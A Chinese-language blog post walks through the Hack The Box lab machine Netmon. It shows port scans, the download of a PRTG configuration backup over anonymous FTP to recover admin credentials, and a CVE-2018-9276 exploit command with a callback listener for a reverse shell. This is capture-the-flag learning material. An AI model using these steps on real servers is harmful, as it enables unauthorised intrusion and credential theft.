[Day29] HTB Netmon

URL : https://app.hackthebox.eu/machines/Netmon
IP : 10.129.210.193

Recon

Rustscan

Open 10.129.210.193:21
Open 10.129.210.193:80
Open 10.129.210.193:135
Open 10.129.210.193:139
Open 10.129.210.193:445
Open 10.129.210.193:5985

nmap
FTP
Web
- appVersion':'18.1.37.13946'
- https://github.com/wildkindcc/CVE-2018-9276
- https://github.com/chcx/PRTG-Network-Monitor-RCE

FTP

Try Exploit
- https://github.com/chcx/PRTG-Network-Monitor-RCE
- 需要登入才能用，所以我们需要找帐密QQ
从官网发现 Log 跟 Config 存在 /ProgramData/Paessler
- wget -r ftp://10.129.210.193/ProgramData/Paessler
- 整包载下来
grep password */* | less
- 发现 PRTG Configuration.dat 很可疑
看到相关的档案有以下几个
- PRTG Configuration.old.bak
- PRTG Configuration.dat
- PRTG Configuration.old
- Configuration Auto-Backups/*
PRTG Configuration.old.bak 应该最可疑
- 看到帐密
  - prtgadmin
  - PrTg@dmin2018
  - 但登入失败
通灵把密码改 2019
- prtgadmin
- PrTg@dmin2019
- 登入成功

Exploit

https://github.com/wildkindcc/CVE-2018-9276
- python CVE-2018-9276.py -i 10.129.210.202 -p 80 --lhost 10.10.16.35 --lport 7877 --user prtgadmin --password PrTg@dmin2019
确定权限
取得 Flag

<<: Day 29：神奇语法糖－v-model

>>: [Day29] Cost Plaining

帐号申请

杂谈

菜鸟新人第七十五天

杂谈

[Day10] 抛物线指标

杂谈

《赖田捕手：番外篇》第 37 天：用 Netlify 布署前端网页 (二)

杂谈

[day 19] 在网页端学Swift 以及 SwiftUI入门

杂谈

【Day02】永丰金融APIs-消费支付API

今天台风天，不知各位今天是否安好！首先开始挑战是银行端的API~ 永丰银行B2B应用有四大API，...

Day 09: 【番外篇】关於写 Code 这件事 (待改进中... )

「42 年里，我什麽都经历过。我被开除过，也被表扬过。我当过小组长、主管、也当过普通员工，甚至当过...

DAY 24 优化检视团购讯息

前面的检视团购讯息，检视团购讯息用文字不好检视这边计画用matplotlib的pyplot将资讯输...

Layout, Render 与 View Helper

版型（Layout）局部渲染（Partial Render） View Helper 在上个章节介...

Day 21 - Vue Router基本概念(1)

如同我们前面几天提到的，Vue的核心是用来处理状态、版面、以及元件的逻辑。但是当整个网站逐渐发展成...